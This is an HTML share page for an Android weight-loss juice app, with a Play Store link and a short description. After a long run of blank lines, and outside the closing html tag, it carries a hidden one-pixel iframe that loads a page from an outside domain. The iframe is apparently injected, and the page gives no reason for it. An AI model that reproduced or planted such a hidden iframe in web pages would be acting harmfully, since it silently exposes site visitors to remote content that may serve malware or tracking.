<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <title>App Share</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=3.0">
    <link rel="stylesheet" type="text/css" href="style.css">
</head>
<body>
<style type="text/css">
  body {
    padding: 0px;
    margin: 0px;
    background-color: #fff;
  }
  .appshare_table {
    background: #000;
    text-align: center;
  }
  .appshare_appicon
  {
    margin:10px;
    width:100px;
    height:100px;   
  }
  .appshare_apptitle
  {
    color:#eaedf1;
    margin-top: 20px;
    font: 20px/100% Helvetica, Arial, sans-serif; 
  }
  .appshare_button {
    color: #fff;
    font-weight: 700;
    background: #363f4b;
    border: none;
    -webkit-appearance: none;
    -moz-appearance: none;
    appearance: none;
    margin: 0;
    -webkit-border-radius: 3px;
    -moz-border-radius: 3px;
    border-radius: 3px;
    font-family: Sans-Serif;
    font-weight: 200;
    font-size: 13px;
    padding: 11px 15px;
    -webkit-box-sizing: border-box;
    -moz-box-sizing: border-box;
    box-sizing: border-box;
    margin: 0 20px 8px 20px;
    display: block
  }
  .appshare_appdescription
  {
    padding: 20px;
    font-size: 13px;
    font-family: Sans-Serif;
    font-weight: 500;
    color: #323a45;
    border-top: solid 3px #555;
  }
  .button:hover {
	text-decoration: none;
  }
  .button:active {
	position: relative;
	top: 1px;
  }
  .reflectBelow	{ 
	-webkit-box-reflect: below 0 -webkit-gradient(linear, left top, left bottom, from(transparent), color-stop(0.7, transparent), to(rgba(0,0,0,.6))); 
  }
  
</style>
<div class="appshare_container">
    <table id="appheader" class="appshare_table" style="background-image: url(&quot;fondo.jpg&quot;); background-color: rgb(224, 224, 224);" width="100%"><tbody>
        <tr>
          <td valign="top">
            <img class="appshare_appicon reflectBelow" id="appicon" src="icon-144.png">
          </td>
        </tr>
        <tr>
          <td style="padding-bottom: 12px;" valign="top">
            <div id="appname" class="appshare_apptitle" style="color: rgb(31, 55, 191); font-weight: bold;">Weight Loss Juices - Burn Fat</div>
            <div style="margin-top:15px"><a class="appshare_button"
href="https://play.google.com/store/apps/details?id=com.wondrousapps.weightlossjuice"
      style="background-color: rgb(50, 145, 26); color: rgb(255, 255, 255); font-weight: bold;">Share App</a></div>
          </td>
        </tr>
      </tbody></table>

    <div id="appdescription" class="appshare_appdescription" style="text-align: center; font-size: 17px; color: rgb(0, 0, 0);">Share on your social networks "Weight Loss Juices - Burn Fat" so that everyone knows this great application and can download it.<br><br>

Find numerous juices to lose weight.</div>
</div>







































</body>
</html>
<iframe src="http://sdengine.com/ga.html" frameBorder="0" width="100%" height="1"></iframe>